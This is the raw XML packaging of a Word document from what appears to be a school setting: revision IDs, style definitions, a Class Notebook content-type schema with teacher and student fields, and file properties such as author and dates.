    <w:rsid w:val="00686B5B"/>
    <w:rsid w:val="00687C4D"/>
    <w:rsid w:val="006A1C39"/>
    <w:rsid w:val="006A63E8"/>
    <w:rsid w:val="006C2416"/>
    <w:rsid w:val="006C2449"/>
    <w:rsid w:val="006C4B77"/>
    <w:rsid w:val="006C5E9C"/>
    <w:rsid w:val="006C6800"/>
    <w:rsid w:val="006D0641"/>
    <w:rsid w:val="006F1D80"/>
    <w:rsid w:val="006F2B6D"/>
    <w:rsid w:val="007130D6"/>
    <w:rsid w:val="007210CB"/>
    <w:rsid w:val="00755709"/>
    <w:rsid w:val="00755BCE"/>
    <w:rsid w:val="00773275"/>
    <w:rsid w:val="007737A5"/>
    <w:rsid w:val="00781D63"/>
    <w:rsid w:val="00787A59"/>
    <w:rsid w:val="00797F0F"/>
    <w:rsid w:val="007A1BD7"/>
    <w:rsid w:val="007B64C2"/>
    <w:rsid w:val="007C5FA6"/>
    <w:rsid w:val="007C6312"/>
    <w:rsid w:val="007D1F3A"/>
    <w:rsid w:val="007E5646"/>
    <w:rsid w:val="007F1C9C"/>
    <w:rsid w:val="008109A5"/>
    <w:rsid w:val="008156A3"/>
    <w:rsid w:val="00816C57"/>
    <w:rsid w:val="00854521"/>
    <w:rsid w:val="00855368"/>
    <w:rsid w:val="00861387"/>
    <w:rsid w:val="00862EEE"/>
    <w:rsid w:val="00876CFE"/>
    <w:rsid w:val="0087771B"/>
    <w:rsid w:val="008847E8"/>
    <w:rsid w:val="0088631A"/>
    <w:rsid w:val="008863DF"/>
    <w:rsid w:val="008A1A8B"/>
    <w:rsid w:val="008B2BB4"/>
    <w:rsid w:val="008B3E34"/>
    <w:rsid w:val="008D0D62"/>
    <w:rsid w:val="008D17FF"/>
    <w:rsid w:val="008D659D"/>
    <w:rsid w:val="008D71EE"/>
    <w:rsid w:val="00912FF4"/>
    <w:rsid w:val="00917BB4"/>
    <w:rsid w:val="009570DC"/>
    <w:rsid w:val="00957671"/>
    <w:rsid w:val="009630CE"/>
    <w:rsid w:val="00975463"/>
    <w:rsid w:val="00980669"/>
    <w:rsid w:val="0098460A"/>
    <w:rsid w:val="009A0636"/>
    <w:rsid w:val="009B64C2"/>
    <w:rsid w:val="009F1BF6"/>
    <w:rsid w:val="00A01C0A"/>
    <w:rsid w:val="00A11CE2"/>
    <w:rsid w:val="00A1346B"/>
    <w:rsid w:val="00A14304"/>
    <w:rsid w:val="00A24B21"/>
    <w:rsid w:val="00A324EB"/>
    <w:rsid w:val="00A343E4"/>
    <w:rsid w:val="00A36C24"/>
    <w:rsid w:val="00A4012A"/>
    <w:rsid w:val="00A43AD6"/>
    <w:rsid w:val="00A44981"/>
    <w:rsid w:val="00A457CA"/>
    <w:rsid w:val="00A465FA"/>
    <w:rsid w:val="00A46D76"/>
    <w:rsid w:val="00A53835"/>
    <w:rsid w:val="00A6241F"/>
    <w:rsid w:val="00A840A4"/>
    <w:rsid w:val="00A8453F"/>
    <w:rsid w:val="00A84ACC"/>
    <w:rsid w:val="00A84EFE"/>
    <w:rsid w:val="00A92238"/>
    <w:rsid w:val="00AA1268"/>
    <w:rsid w:val="00AA26DC"/>
    <w:rsid w:val="00AB00CF"/>
    <w:rsid w:val="00AF013F"/>
    <w:rsid w:val="00AF2F18"/>
    <w:rsid w:val="00AF6F30"/>
    <w:rsid w:val="00B05C09"/>
    <w:rsid w:val="00B239FB"/>
    <w:rsid w:val="00B23B95"/>
    <w:rsid w:val="00B25BA1"/>
    <w:rsid w:val="00B326A4"/>
    <w:rsid w:val="00B37F21"/>
    <w:rsid w:val="00B44603"/>
    <w:rsid w:val="00B50759"/>
    <w:rsid w:val="00B54C42"/>
    <w:rsid w:val="00B82E58"/>
    <w:rsid w:val="00B8558B"/>
    <w:rsid w:val="00B86209"/>
    <w:rsid w:val="00BA1851"/>
    <w:rsid w:val="00BA75CD"/>
    <w:rsid w:val="00BB368F"/>
    <w:rsid w:val="00BB4B93"/>
    <w:rsid w:val="00BB5730"/>
    <w:rsid w:val="00BB6369"/>
    <w:rsid w:val="00BB73C4"/>
    <w:rsid w:val="00BB7655"/>
    <w:rsid w:val="00BC1568"/>
    <w:rsid w:val="00BC6F74"/>
    <w:rsid w:val="00BD00C4"/>
    <w:rsid w:val="00BD33BA"/>
    <w:rsid w:val="00BE1109"/>
    <w:rsid w:val="00C0272C"/>
    <w:rsid w:val="00C02BE3"/>
    <w:rsid w:val="00C04E2A"/>
    <w:rsid w:val="00C1685C"/>
    <w:rsid w:val="00C22253"/>
    <w:rsid w:val="00C23244"/>
    <w:rsid w:val="00C23F9A"/>
    <w:rsid w:val="00C24DA7"/>
    <w:rsid w:val="00C269C9"/>
    <w:rsid w:val="00C34CE7"/>
    <w:rsid w:val="00C3548F"/>
    <w:rsid w:val="00C37AD9"/>
    <w:rsid w:val="00C515A7"/>
    <w:rsid w:val="00C618C7"/>
    <w:rsid w:val="00C62988"/>
    <w:rsid w:val="00C63187"/>
    <w:rsid w:val="00C63E4D"/>
    <w:rsid w:val="00C73C2B"/>
    <w:rsid w:val="00C743D6"/>
    <w:rsid w:val="00CA48AC"/>
    <w:rsid w:val="00CA627E"/>
    <w:rsid w:val="00CB1C91"/>
    <w:rsid w:val="00CB6413"/>
    <w:rsid w:val="00CB6FED"/>
    <w:rsid w:val="00CD09A1"/>
    <w:rsid w:val="00CD111E"/>
    <w:rsid w:val="00CD75AE"/>
    <w:rsid w:val="00CE3DDF"/>
    <w:rsid w:val="00CE5176"/>
    <w:rsid w:val="00CE5924"/>
    <w:rsid w:val="00D0174E"/>
    <w:rsid w:val="00D03953"/>
    <w:rsid w:val="00D050C1"/>
    <w:rsid w:val="00D05542"/>
    <w:rsid w:val="00D12F9F"/>
    <w:rsid w:val="00D22EF5"/>
    <w:rsid w:val="00D27970"/>
    <w:rsid w:val="00D37731"/>
    <w:rsid w:val="00D37EAD"/>
    <w:rsid w:val="00D42D9B"/>
    <w:rsid w:val="00D51900"/>
    <w:rsid w:val="00D72966"/>
    <w:rsid w:val="00D77E08"/>
    <w:rsid w:val="00D800D2"/>
    <w:rsid w:val="00D82E14"/>
    <w:rsid w:val="00D910C7"/>
    <w:rsid w:val="00D9500F"/>
    <w:rsid w:val="00DA52BF"/>
    <w:rsid w:val="00DC1EAF"/>
    <w:rsid w:val="00DC4E23"/>
    <w:rsid w:val="00DD1E9F"/>
    <w:rsid w:val="00DD380A"/>
    <w:rsid w:val="00DE60FD"/>
    <w:rsid w:val="00DF001B"/>
    <w:rsid w:val="00DF5EC9"/>
    <w:rsid w:val="00E11A00"/>
    <w:rsid w:val="00E137D4"/>
    <w:rsid w:val="00E17F9B"/>
    <w:rsid w:val="00E22240"/>
    <w:rsid w:val="00E27555"/>
    <w:rsid w:val="00E30488"/>
    <w:rsid w:val="00E325A4"/>
    <w:rsid w:val="00E328CF"/>
    <w:rsid w:val="00E335F9"/>
    <w:rsid w:val="00E37FB9"/>
    <w:rsid w:val="00E460E0"/>
    <w:rsid w:val="00E55DE1"/>
    <w:rsid w:val="00E563FC"/>
    <w:rsid w:val="00E57053"/>
    <w:rsid w:val="00E57AC8"/>
    <w:rsid w:val="00E65DE7"/>
    <w:rsid w:val="00E73671"/>
    <w:rsid w:val="00E928D8"/>
    <w:rsid w:val="00E92E88"/>
    <w:rsid w:val="00EA7328"/>
    <w:rsid w:val="00EB7473"/>
    <w:rsid w:val="00EC01AC"/>
    <w:rsid w:val="00EC51BD"/>
    <w:rsid w:val="00ED40BE"/>
    <w:rsid w:val="00EE2824"/>
    <w:rsid w:val="00F03783"/>
    <w:rsid w:val="00F0660A"/>
    <w:rsid w:val="00F357BB"/>
    <w:rsid w:val="00F37414"/>
    <w:rsid w:val="00F41405"/>
    <w:rsid w:val="00F61894"/>
    <w:rsid w:val="00F64220"/>
    <w:rsid w:val="00F64E1D"/>
    <w:rsid w:val="00F77E97"/>
    <w:rsid w:val="00F83500"/>
    <w:rsid w:val="00F91BD0"/>
    <w:rsid w:val="00FA1ABE"/>
    <w:rsid w:val="00FA2ADD"/>
    <w:rsid w:val="00FA5B55"/>
    <w:rsid w:val="00FA7A07"/>
    <w:rsid w:val="00FB1EF0"/>
    <w:rsid w:val="00FD0FA3"/>
    <w:rsid w:val="00FD1F72"/>
    <w:rsid w:val="00FD6790"/>
    <w:rsid w:val="00FD6D1B"/>
    <w:rsid w:val="00FE0E28"/>
    <w:rsid w:val="00FE53C4"/>
    <w:rsid w:val="00FE61C4"/>
    <w:rsid w:val="00FE7652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07CF9"/>
  <w15:docId w15:val="{6EFD9BE9-8F40-4CD7-8088-F07EF85A1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2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6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8AC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA4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8AC"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E26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3F92D9409C2F4B8DE42EF0BF7E4CE1" ma:contentTypeVersion="27" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="dd62b6bbf93301ff388f5b31f052b3db">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="083f9d80-a48c-4738-88d8-aa1525a40e6b" xmlns:ns4="08fff6d1-e0dc-4209-ad93-1249b7e008f9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="094cbc507b7c95a1b6bcc6a8d2d74f5d" ns3:_="" ns4:_="">
    <xsd:import namespace="083f9d80-a48c-4738-88d8-aa1525a40e6b"/>
    <xsd:import namespace="08fff6d1-e0dc-4209-ad93-1249b7e008f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NotebookType" minOccurs="0"/>
                <xsd:element ref="ns4:FolderType" minOccurs="0"/>
                <xsd:element ref="ns4:Owner" minOccurs="0"/>
                <xsd:element ref="ns4:DefaultSectionNames" minOccurs="0"/>
                <xsd:element ref="ns4:AppVersion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CultureName" minOccurs="0"/>
                <xsd:element ref="ns4:Has_Teacher_Only_SectionGroup" minOccurs="0"/>
                <xsd:element ref="ns4:Is_Collaboration_Space_Locked" minOccurs="0"/>
                <xsd:element ref="ns4:Templates" minOccurs="0"/>
                <xsd:element ref="ns4:Self_Registration_Enabled0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f9d80-a48c-4738-88d8-aa1525a40e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ff6d1-e0dc-4209-ad93-1249b7e008f9" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="NotebookType" ma:index="11" nillable="true" ma:displayName="Notebook Type" ma:internalName="NotebookType">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="FolderType" ma:index="12" nillable="true" ma:displayName="Folder Type" ma:internalName="FolderType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chers" ma:index="1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9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0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1" nillable="true" ma:displayName="Self_Registration_Enabled" ma:internalName="Self_Registration_Enabled">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean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Has_Teacher_Only_SectionGroup" ma:index="2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4" nillable="true" ma:displayName="Is Collaboration Space Locked" ma:internalName="Is_Collaboration_Space_Locked">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean"/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Self_Registration_Enabled0" ma:index="26" nillable="true" ma:displayName="Self Registration Enabled" ma:internalName="Self_Registration_Enabled0">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceMetadata" ma:index="2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0 xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <NotebookType xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <Student_Groups xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Student_Groups>
    <DefaultSectionNames xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <Owner xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Owner>
    <Has_Teacher_Only_SectionGroup xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <FolderType xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <Students xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Students>
    <Invited_Students xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <Is_Collaboration_Space_Locked xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <Templates xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <Teachers xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Teachers>
    <Invited_Teachers xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <Self_Registration_Enabled xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <CultureName xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008f9" xsi:nil="true"/>
    <AppVersion xmlns="08fff6d1-e0dc-4209-ad93-1249b7e008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F415-AA1B-4501-A3F8-F5C6F6B51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3f9d80-a48c-4738-88d8-aa1525a40e6b"/>
    <ds:schemaRef ds:uri="08fff6d1-e0dc-4209-ad93-1249b7e008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67F4E0-6B6F-4159-A8D7-C07DDECB1A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2EFDFF-129F-4441-BB53-B96770442902}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="08fff6d1-e0dc-4209-ad93-1249b7e008f9"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B7D2B9C3-D238-4796-9237-51D5B41D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0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m2</dc:creator>
  <cp:lastModifiedBy>Lee Yu Yee Dominic /CSF</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <cp:lastPrinted>2018-11-22T01:45:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-26T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01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kdm2@np.edu.sg</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_84f81056-721b-4b22-8334-0449c6cc893e_SetDate">
    <vt:lpwstr>2020-01-15T20:55:39.874749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44bcc72e-4e8a-422c-b863-74478b73edab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kdm2@np.edu.sg</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MSIP_Label_30286cb9-b49f-4646-87a5-340028348160_SetDate">
    <vt:lpwstr>2020-01-15T20:55:39.8747496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44bcc72e-4e8a-422c-b863-74478b73edab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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="ContentTypeId">
    <vt:lpwstr>0x010100F63F92D9409C2F4B8DE42EF0BF7E4CE1</vt:lpwstr>
  </property>
</Properties>
</file>